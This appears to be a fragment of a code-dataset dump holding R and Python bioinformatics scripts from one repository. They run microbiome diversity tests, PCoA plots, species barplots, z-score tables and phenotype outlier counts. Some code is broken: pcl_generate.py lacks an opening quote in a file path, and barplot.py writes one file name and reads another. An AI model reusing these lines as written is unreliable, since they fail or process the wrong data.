"text": "library(dplyr)\nlibrary(ggplot2)\nexp_div = read.table('exp_div.txt', header=T, row.names=1)\nggplot(exp_div, aes(x=factor(exp_div$Group, level=c('CK','Cigarette','E-liquid')), y=exp_div$shannon, fill = Group)) + geom_boxplot() + labs(x=\"\",y=\"shannon index\") + theme(\n axis.text = element_text(colour = 'black', size = 10), # 字号改成 20 放在 PPT 里比较合适\n axis.title = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in'))\n\n#差异检验\nck_sha = filter(exp_div, Group=='CK')$shannon\ncig_sha = filter(exp_div, Group=='Cigarette')$shannon\nel_sha = filter(exp_div, Group=='E-liquid')$shannon\nwilcox.test(ck_sha,cig_sha)$p.value\nwilcox.test(ck_sha,el_sha)$p.value\nwilcox.test(cig_sha,el_sha)$p.value\n"
},
{
"alpha_fraction": 0.6777408719062805,
"alphanum_fraction": 0.6910299062728882,
"avg_line_length": 42,
"blob_id": "091c3ccb1430ef52caea9c80901d8692e955bde8",
"content_id": "f08ca30f8a7444f4dc5ac4d2d3ffa7de82a47d56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 321,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 7,
"path": "/Humann2/pcl_generate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#用于生成使用 humann2_barplot 画 barplot 的文件\nimport pandas as pd\ndt = pd.read_table(pathabd_rename.xls', index_col = 0)\ngroup = pd.read_table('phenotype.xls', index_col=0)\ngroup_dt = group['Group'].to_frame('Group')\ndt_merge = pd.concat([group_dt,dt.T], axis = 1)\ndt_merge.T.to_csv('pathabd.pcl',sep = '\\t')\n"
},
{
"alpha_fraction": 0.7292197942733765,
"alphanum_fraction": 0.7292197942733765,
"avg_line_length": 74.38461303710938,
"blob_id": "9514a7da328dd5ebbf19e424ebdea9204cba1dc6",
"content_id": "57eeb0b9fd2417f197e5760214d1ff5243f63386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1961,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 26,
"path": "/rat/Mshannon_KW.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\ndt = read.table('FrecoveryDiversity.txt', header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette'))\nresult = kruskal.test(shannon ~ Group, data = dt)\nkw_result = data.frame(unclass(result), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(kw_result,file = \"Frecovery_kruskal_shannon.txt\", sep = \"\\t\",quote = F,col.names=NA)\npairwise_wilcox = pairwise.wilcox.test(dt$shannon, dt$Group, p.adjust.method = \"BH\")\npairwise_wilcox = data.frame(unclass(pairwise_wilcox), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(pairwise_wilcox,file = \"Frecovery_pairwise_wilcox_shannon.txt\", sep = \"\\t\", quote = F,col.names=NA)\n\ndt = read.table('MrecoveryDiversity.txt', header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette'))\nresult = kruskal.test(shannon ~ Group, data = dt)\nkw_result = data.frame(unclass(result), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(kw_result,file = \"Mrecovery_kruskal_shannon.txt\", sep = \"\\t\",quote = F,col.names=NA)\npairwise_wilcox = pairwise.wilcox.test(dt$shannon, dt$Group, p.adjust.method = \"BH\")\npairwise_wilcox = data.frame(unclass(pairwise_wilcox), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(pairwise_wilcox,file = \"Mrecovery_pairwise_wilcox_shannon.txt\", sep = \"\\t\", quote = F,col.names=NA)\n\ndt = read.table('FrecoveryDiversity.txt', header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette'))\nresult = kruskal.test(number ~ Group, data = dt)\nkw_result = data.frame(unclass(result), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(kw_result,file = \"Frecovery_kruskal_number.txt\", sep = \"\\t\",quote = F,col.names=NA)\npairwise_wilcox = pairwise.wilcox.test(dt$number, dt$Group, p.adjust.method = \"BH\")\npairwise_wilcox = data.frame(unclass(pairwise_wilcox), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(pairwise_wilcox,file = \"Frecovery_pairwise_wilcox_number.txt\", sep = \"\\t\", quote = F,col.names=NA)\n"
},
{
"alpha_fraction": 0.6175920367240906,
"alphanum_fraction": 0.650343120098114,
"avg_line_length": 45.463768005371094,
"blob_id": "2912665da25a6cf3edbcd8c06fdf5640a05732d2",
"content_id": "8b2f656919fb9224dbf3fe5cfb1296a2848e436a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6468,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 138,
"path": "/PCoA.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/R\nlibrary(ggpubr)\nlibrary(\"ggplot2\")\nlibrary(\"ape\")\nlibrary(\"vegan\")\nlibrary(ggrepel)\nArgs <- commandArgs(TRUE)\nabd_table = Args[1] # 丰度文件 expose_abd.txt \ngroup_table = Args[2] # 分组文件 Sample_information_detail.txt \ngroup_list = Args[3] # Healthy:CASE\ncolor_list = Args[4] # 4daf4a:984ea3\nlegend_list = unlist(strsplit(group_list, \":\"))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nfilename_prefix = gsub(\":\", \"_\", group_list)\n\n# plot PCoA \nprofile <- t(read.table(abd_table,header=T, row.names=1, sep = \"\\t\", check.name = F))\ngroup <- read.table(group_table, header=T, check.name = F)\nbeta.dis <- vegdist(profile, method = \"bray\")\nPCOA <- pcoa(beta.dis, correction=\"none\", rn=NULL)\nresult <- PCOA$values[,\"Relative_eig\"]\npco1 <- as.numeric(sprintf(\"%0.3f\",result[1]))*100\npco2 <- as.numeric(sprintf(\"%0.3f\",result[2]))*100\npc <- as.data.frame(PCOA$vectors)\npc$SampleID = rownames(profile)\nMerge.result <- merge(pc,group,by=\"SampleID\",all=TRUE)\nxlab=paste(\"PCoA1(\",pco1,\"%)\",sep=\"\")\nylab=paste(\"PCoA2(\",pco2,\"%)\",sep=\"\")\nMerge.result$Group = factor(Merge.result$Group, levels=legend_list)\npcoa = ggplot(Merge.result,aes(Axis.1,Axis.2)) +\n geom_point(size=3,aes(color=Group,shape=Group)) + \n geom_text_repel(aes(label = SampleID)) + #加标签\t\n scale_color_manual(values = color_var) + \n geom_hline(yintercept=0,linetype=4,color=\"grey\") +\n geom_vline(xintercept=0,linetype=4,color=\"grey\") +\n labs(x=xlab,y=ylab) +\n theme_bw() +\n theme(axis.text = element_text(colour = 'black', size = 10), \n\t\taxis.title = element_text(size = 12),\n\t\tpanel.background = element_rect(colour = \"black\", size = 1),\n\t\tpanel.grid =element_blank(), \n\t\tlegend.key = element_blank(),\n\t\tlegend.text = element_text(size = 10), \n\t\tlegend.title = element_blank(), legend.position='none', \n\t\tplot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\t\n\n# PCo1 & PCo2\npcoa1_diff = compare_means(Axis.1 ~ Group, Merge.result) ## default wilcox.test \nwrite.table(pcoa1_diff,file = paste(filename_prefix,\"_pcoa1_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pcoa1_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 增加没有差异检验结果显著的判断\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npcoa1 = ggplot(Merge.result,aes(x=Group, y=Axis.1,colour=Group)) + geom_boxplot()+stat_compare_means(comparisons=my_comparisons, label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(Merge.result$Axis.1)) +\n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA1\") + \n scale_y_continuous(limits = c(min(Merge.result$Axis.1), max(Merge.result$Axis.1) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n} else {\npcoa1 = ggplot(Merge.result,aes(x=Group, y=Axis.1,colour=Group)) + geom_boxplot() +\n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA1\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n}\n\npcoa2_diff = compare_means(Axis.2 ~ Group, Merge.result) ## default wilcox.test \nwrite.table(pcoa2_diff,file = paste(filename_prefix,\"_pcoa2_Diffresult.txt\", sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pcoa2_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 同上\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npcoa2 = ggplot(Merge.result,aes(x=Group, y=Axis.2,colour=Group)) + geom_boxplot()+stat_compare_means(comparisons=my_comparisons, label = \"p.signif\",label.y = c(0.02,0.04,0.09) + max(Merge.result$Axis.2)) + \n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA2\") + \n scale_y_continuous(limits = c(min(Merge.result$Axis.2), max(Merge.result$Axis.2) + 0.1)) +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n} else {\npcoa2 = ggplot(Merge.result,aes(x=Group, y=Axis.2,colour=Group)) + geom_boxplot() +\n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA2\") +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n}\n#output\npdf(paste(filename_prefix,\"_PCoA.pdf\",sep=\"\"),width=6,height=4)\npng(paste(filename_prefix,\"_PCoA.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\nlibrary(grid)\nlibrary(\"gridBase\")\nplot.new()\nplotlayout <- grid.layout(nrow=2,ncol=3)\nvp1 <- viewport(layout.pos.col=c(1,2),layout.pos.row=c(1,2))\nvp2 <- viewport(layout.pos.col=3,layout.pos.row=1)\nvp3 <- viewport(layout.pos.col=3,layout.pos.row=2)\npushViewport(viewport(layout=plotlayout))\npushViewport(vp1)\npar(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2))\nprint(pcoa,newpage=FALSE)\npopViewport()\n\npushViewport(vp2)\npar(new=TRUE,fig=gridFIG())\nprint(pcoa1,newpage=FALSE)\npopViewport()\n\npushViewport(vp3)\npar(new=TRUE,fig=gridFIG())\nprint(pcoa2,newpage=FALSE)\npopViewport()\n\ndev.off()\n"
},
{
"alpha_fraction": 0.5853304862976074,
"alphanum_fraction": 0.6043351888656616,
"avg_line_length": 38.63030242919922,
"blob_id": "879a56eb42767ca657c1800cfd0834676b4ed9bc",
"content_id": "237359a9d94b9b8a25d19e17129c225a7f179459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13830,
"license_type": "no_license",
"max_line_length": 314,
"num_lines": 330,
"path": "/CHD/barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 感觉非常个性化。。。所以就先不整合了,放在这里记录.. 包括生成物种组成柱状图,热图还有箱线图,涉及门水平,中水平,以及单独五个物种。\n## CHD\n#种的 barplot\nimport pandas as pd\ndt = pd.read_table('MetaPhlAn2_species.draw_barplot.txt', index_col = 0,sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col = 0, sep='\\t')\nmerge = pd.concat([dt,group.loc[dt.index]], axis=1)\nmerge['individual'] = merge.index\nnew_merge = merge.loc[:,['individual', 'level', 'abundance', 'Description']]\nnew_merge.columns.values[1] = 'tax'\nnew_merge.columns.values[3] = 'group'\nnew_merge.to_csv('CHD_barplot.txt', index=0, sep='\\t')\n\n## 合并后的 barplot\ndt = pd.read_table('Species.combine_relative_abundance.xls', index_col = 0, sep='\\t')\ntax_list = [\"Faecalibacterium_prausnitzii\",\"Escherichia_coli\",\"Eubacterium_rectale\",\"Subdoligranulum_unclassified\",\"Ruminococcus_bromii\",\"Bifidobacterium_adolescentis\",\"Klebsiella_pneumoniae\",\"Bifidobacterium_longum\",\"Alistipes_putredinis\",\"Bacteroides_vulgatus\",\"Escherichia_unclassified\",\"Bacteroides_uniformis\"]\ndt_13 = dt.loc[tax_list]\nother = dt[[False if x in tax_list else True for x in dt.index]] \nother_row = other.sum().to_frame(name = \"Others\").T\nmerge = pd.concat([dt_13, other_row])\nmerge.to_csv('CHD_combine_barplot.txt',sep = '\\t')\n\n#重新整理输出 barplot.txt\ndt = pd.read_table('CHD_combine_barplot.txt', sep='\\t', index_col=0)\nAMI = dt['AMI'].to_frame(name = 'abundance')\nAMI['group'] = 'AMI'\nsCAD = dt['sCAD'].to_frame(name = 'abundance')\nsCAD['group'] = 'sCAD'\nNCA = dt['NCA'].to_frame(name = 'abundance')\nNCA['group'] = 'NCA'\nmerge = pd.concat([AMI, sCAD, NCA])\nmerge['tax'] = merge.index\nmerge = merge[['tax','abundance', 'group']]\nmerge.to_csv('CHD_new_combine_barplot.txt', index = 0, sep = '\\t')\n\n# 计算 门 水平的 Zscore\n## 计算 z core\ndt = pd.read_table('Phylum.rabun.xls', index_col=0)\nfrom scipy.stats import zscore\ndt_z = dt.apply(zscore, axis=1).T\nNCA_mean = dt_z.loc[group.loc[group['Description'] == 'NCA'].index].mean().to_frame(name='NCA')\nsCAD_mean = dt_z.loc[group.loc[group['Description'] == 'sCAD'].index].mean().to_frame(name='sCAD')\nAMI_mean = dt_z.loc[group.loc[group['Description'] == 'AMI'].index].mean().to_frame(name='AMI')\nz_merge = pd.concat([NCA_mean,sCAD_mean,AMI_mean], axis=1)\n\n# 提取差异物种 ID\nNCA_sCAD = pd.read_table('Phylum_MetaPhlAn2.NCA-sCAD.wilcox.test.xls', index_col=0)\nNCA_AMI = pd.read_table('Phylum_MetaPhlAn2.NCA-AMI.wilcox.test.xls', index_col=0)\nAMI_sCAD = pd.read_table('Phylum_MetaPhlAn2.AMI-sCAD.wilcox.test.xls', index_col=0)\n\nNCA_sCAD_diff = list(NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05].index)\nNCA_AMI_diff = list(NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05].index)\nAMI_sCAD_diff = list(AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05].index)\ndiff_tax = NCA_sCAD_diff + NCA_AMI_diff + AMI_sCAD_diff\ndiff_tax = list(set(diff_tax)) # 去重复\nz_plot = z_merge.loc[diff_tax].T\nz_plot.to_csv('zscore_phylum.txt', sep=\"\\t\")\n\n#注释的表格\ntemp = NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs AMI'] = label\nNCA_AMI_p = temp.drop(['qvalue'], axis=1)\n\ntemp = NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs sCAD'] = label\nNCA_sCAD_p = temp.drop(['qvalue'], axis=1)\n\ntemp = AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['sCAD vs AMI'] = label\nAMI_sCAD_p = temp.drop(['qvalue'], axis=1)\n\nall_p = pd.concat([AMI_sCAD_p,NCA_AMI_p,NCA_sCAD_p], axis=1)\nall_p.fillna('No.sig').to_csv('annotation_col.txt', sep='\\t')\n\n#计算种水平的 Zscore\ndt = pd.read_table('Species.rabun.xls', index_col=0)\nfrom scipy.stats import zscore\ndt_z = dt.apply(zscore, axis=1).T\nNCA_mean = dt_z.loc[group.loc[group['Description'] == 'NCA'].index].mean().to_frame(name='NCA')\nsCAD_mean = dt_z.loc[group.loc[group['Description'] == 'sCAD'].index].mean().to_frame(name='sCAD')\nAMI_mean = dt_z.loc[group.loc[group['Description'] == 'AMI'].index].mean().to_frame(name='AMI')\nz_merge = pd.concat([NCA_mean,sCAD_mean,AMI_mean], axis=1)\n\n# 提取差异物种 ID\nNCA_sCAD = pd.read_table('Species_MetaPhlAn2.NCA-sCAD.wilcox.test.xls', index_col=0)\nNCA_AMI = pd.read_table('Species_MetaPhlAn2.NCA-AMI.wilcox.test.xls', index_col=0)\nAMI_sCAD = pd.read_table('Species_MetaPhlAn2.AMI-sCAD.wilcox.test.xls', index_col=0)\n\nNCA_sCAD_diff = list(NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05].index)\nNCA_AMI_diff = list(NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05].index)\nAMI_sCAD_diff = list(AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05].index)\ndiff_tax = NCA_sCAD_diff + NCA_AMI_diff + AMI_sCAD_diff\ndiff_tax = list(set(diff_tax)) # 去重复\nz_plot = z_merge.loc[diff_tax].T\nz_plot.to_csv('zscore_species.txt', sep=\"\\t\")\n\n# 生成标签\ntemp = NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs AMI'] = label\nNCA_AMI_p = temp.drop(['qvalue'], axis=1)\n\ntemp = NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs sCAD'] = label\nNCA_sCAD_p = temp.drop(['qvalue'], axis=1)\n\ntemp = AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['sCAD vs AMI'] = label\nAMI_sCAD_p = temp.drop(['qvalue'], axis=1)\n\nall_p = pd.concat([AMI_sCAD_p,NCA_AMI_p,NCA_sCAD_p], axis=1)\nall_p.fillna('No.sig').to_csv('species_annotation_col.txt', sep='\\t')\n\n# 挑选出的五个物种\ndt = pd.read_table('zscore_species.txt', index_col=0)\nitems = [\"Lactobacillus_mucosae\", \"Lactobacillus_crispatus\", \"Atopobium_parvulum\", \"Alistipes_onderdonkii\", \"Pyramidobacter_piscolens\"]\nfive_zscore = dt[items]\nfive_zscore.to_csv('zscore_five_species.txt',sep=\"\\t\")\nanno = pd.read_table('species_annotation_col.txt', index_col=0)\nanno.loc[items].to_csv('five_species_annotation_col.txt', sep='\\t')\n\n## 直接生成差异物种(患者和健康人)的箱线图,患者之间单独比吧...\n## 门水平\ndiff = dict()\nwith open('Phylum_MetaPhlAn2.NCA-sCAD.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n diff[line[0]] = line[9]\n else:\n continue\n\ncase_list = ['sCAD', 'AMI']\nhc_list = ['NCA']\n\nwith open('Phylum_MetaPhlAn2.NCA-AMI.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n if line[0] in diff:\n if diff[line[0]] in case_list and line[9] in case_list:\n continue\n elif diff[line[0]] in hc_list and line[9] in hc_list:\n continue\n else:\n print(line)\n del diff[line[0]]\n else:\n diff[line[0]] = line[9]\n else:\n continue\n\n#print(diff)\ncase_tax = list()\nhc_tax = list() \n \nfor key in diff:\n if diff[key] in case_list:\n case_tax.append(key)\n else:\n hc_tax.append(key)\n\n## 对患者和健康人每组的物种按照所有样本均值的大小排序,得到 R 画图的 x 轴的顺序\ndt = pd.read_table('Phylum.rabun.xls', index_col=0)\ncase_order = list(dt.loc[case_tax].mean(axis=1).sort_values(ascending = False).index)\nhc_order = list(dt.loc[hc_tax].mean(axis=1).sort_values(ascending = False).index)\nall_order = case_order[:14] + hc_order\nprint(':'.join(all_order))\n\n# 有时候需要个性化一下\n#all_order = [\"Verrucomicrobia\",\"Synergistetes\"]\n\n# 根据到的物种 ID 从丰度表里提取数据并且生成画箱线图的数据\n#dt = pd.read_table('Species.rabun.xls', index_col=0)\ndt.loc[all_order].to_csv('diff_species_abd.txt', sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col=0)\ngroup_dict = group.to_dict()\nwith open('diff_phylum_abd.txt', 'r') as abd, open('phylum_boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in all_order:\n for index in range(1,len(line)):\n if float(line[index]) != 0:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n else:\n print(line[0] + '\\t'+ \"1e-06\" + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n\n### 种水平的处理\ndiff = dict()\nwith open('Species_MetaPhlAn2.NCA-sCAD.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n diff[line[0]] = line[9]\n else:\n continue\n\ncase_list = ['sCAD', 'AMI']\nhc_list = ['NCA']\n\nwith open('Species_MetaPhlAn2.NCA-AMI.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n if line[0] in diff:\n if diff[line[0]] in case_list and line[9] in case_list:\n continue\n elif diff[line[0]] in hc_list and line[9] in hc_list:\n continue\n else:\n print(line)\n del diff[line[0]]\n else:\n diff[line[0]] = line[9]\n else:\n continue\n\n#print(diff)\ncase_tax = list()\nhc_tax = list() \n \nfor key in diff:\n if diff[key] in case_list:\n case_tax.append(key)\n else:\n hc_tax.append(key)\n\n## 对患者和健康人每组的物种按照所有样本均值的大小排序,得到 R 画图的 x 轴的顺序\ndt = pd.read_table('Species.rabun.xls', index_col=0)\ncase_order = list(dt.loc[case_tax].mean(axis=1).sort_values(ascending = False).index)\nhc_order = list(dt.loc[hc_tax].mean(axis=1).sort_values(ascending = False).index)\nall_order = case_order[:14] + hc_order\nprint(':'.join(all_order))\n\n# 根据到的物种 ID 从丰度表里提取数据并且生成画箱线图的数据\ndt = pd.read_table('Species.rabun.xls', index_col=0)\ndt.loc[all_order].to_csv('diff_species_abd.txt', sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col=0)\ngroup_dict = group.to_dict()\nwith open('diff_species_abd.txt', 'r') as abd, open('species_boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in all_order:\n for index in range(1,len(line)):\n if float(line[index]) != 0:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n else:\n print(line[0] + '\\t'+ \"1e-06\" + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n\n### 五个物种的的处理\ndiff = dict()\nwith open('Species_MetaPhlAn2.NCA-sCAD.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n diff[line[0]] = line[9]\n else:\n continue\n\ncase_list = ['sCAD', 'AMI']\nhc_list = ['NCA']\n\nwith open('Species_MetaPhlAn2.NCA-AMI.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n if line[0] in diff:\n if diff[line[0]] in case_list and line[9] in case_list:\n continue\n elif diff[line[0]] in hc_list and line[9] in hc_list:\n continue\n else:\n print(line)\n del diff[line[0]]\n else:\n diff[line[0]] = line[9]\n else:\n continue\n\n#print(diff)\ncase_tax = list()\nhc_tax = list() \n\nitems = [\"Lactobacillus_mucosae\", \"Lactobacillus_crispatus\", \"Atopobium_parvulum\", \"Alistipes_onderdonkii\", \"Pyramidobacter_piscolens\"]\nfor key in items:\n if key in diff:\n#for key in diff:\n if diff[key] in case_list:\n case_tax.append(key)\n else:\n hc_tax.append(key)\n\n## 对患者和健康人每组的物种按照所有样本均值的大小排序,得到 R 画图的 x 轴的顺序\ndt = pd.read_table('Species.rabun.xls', index_col=0)\ncase_order = list(dt.loc[case_tax].mean(axis=1).sort_values(ascending = False).index)\nhc_order = list(dt.loc[hc_tax].mean(axis=1).sort_values(ascending = False).index)\nall_order = case_order[:14] + hc_order\nprint(':'.join(all_order))\n\n# 根据到的物种 ID 从丰度表里提取数据并且生成画箱线图的数据\n#dt = pd.read_table('Species.rabun.xls', index_col=0)\ndt.loc[all_order].to_csv('five_diff_species_abd.txt', sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col=0)\ngroup_dict = group.to_dict()\nwith open('five_diff_species_abd.txt', 'r') as abd, open('five_species_boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in all_order:\n for index in range(1,len(line)):\n if float(line[index]) != 0:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n else:\n print(line[0] + '\\t'+ \"1e-06\" + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n \n"
},
{
"alpha_fraction": 0.5820484757423401,
"alphanum_fraction": 0.6161894202232361,
"avg_line_length": 44.20000076293945,
"blob_id": "cdf96f8f4f2e47f02ee0d6c6e0471cb5bb72b15d",
"content_id": "e32f9cbae38b7f7776819313e21181b8da4940c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2076,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 40,
"path": "/Phenotype/abnormal_values.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 统计表型信息的缺失值和异常值,这里异常值的定义为 大于第三分位数 + 1.5 倍的四分位距或者小于第一分位数的 - 1.5 倍的四分位距;\n#20190505 更新,阜外项目的表型信息记录\nimport pandas as pd \ndt = pd.read_table('phenotype.xls', index_col = 0)\n# 缺失值的统计\n# >10 样品以上缺失的表型信息 \nnan_dt = dt.loc[:,dt.isnull().sum() > 10]\ngroup_dt = dt['Group'].to_frame()\n#type(group_dt)\ngroup_dt\ndt_merge = pd.concat([nan_dt, group_dt], axis=1)\n# 统计各组的异常值数目\nprint('===NCA n=42 ===')\nprint(dt_merge.loc[dt_merge['Group'] == 'NCA'].isnull().sum())\ndt_merge.loc[dt_merge['Group'] == 'NCA'].isnull().sum().to_frame(name = 'Nan Number(n = 42)').to_csv('NCA_NaN.txt', sep = \"\\t\")\nprint('\\n===sCAD n=54 ===')\nprint(dt_merge.loc[dt_merge['Group'] == 'sCAD'].isnull().sum())\ndt_merge.loc[dt_merge['Group'] == 'sCAD'].isnull().sum().to_frame(name = 'Nan Number(n = 54)').to_csv('sCAD_NaN.txt', sep = \"\\t\")\nprint('\\n===AMI n=52 ===')\nprint(dt_merge.loc[dt_merge['Group'] == 'AMI'].isnull().sum())\ndt_merge.loc[dt_merge['Group'] == 'AMI'].isnull().sum().to_frame(name = 'Nan Number(n = 52)').to_csv('AMI_NaN.txt', sep = \"\\t\")\n#nan_dt\n#pd.concat[[dt.loc[:,'Group'],dt.loc[:,dt.isnull().sum() > 10]]]\n#后边的结果需要继续优化 20190506\n\n## 统计离群值\ndt = pd.read_table('phenotype.xls', index_col = 0)\nfloat_dt = dt.loc[:,dt.dtypes == \"float64\"] # 只处理浮点型变量\nimport numpy as np\nfor item in float_dt.columns: \n Percentile = np.nanpercentile(dt[item],[0,25,50,75,100])\n IQR = Percentile[3] - Percentile[1]\n UpLimit = Percentile[3] + IQR*1.5 #最大以及最小值(下行)\n DownLimit = Percentile[1] - IQR*1.5\n abn_number = ((dt[item] > UpLimit) | (dt[item] < DownLimit)).sum()\n 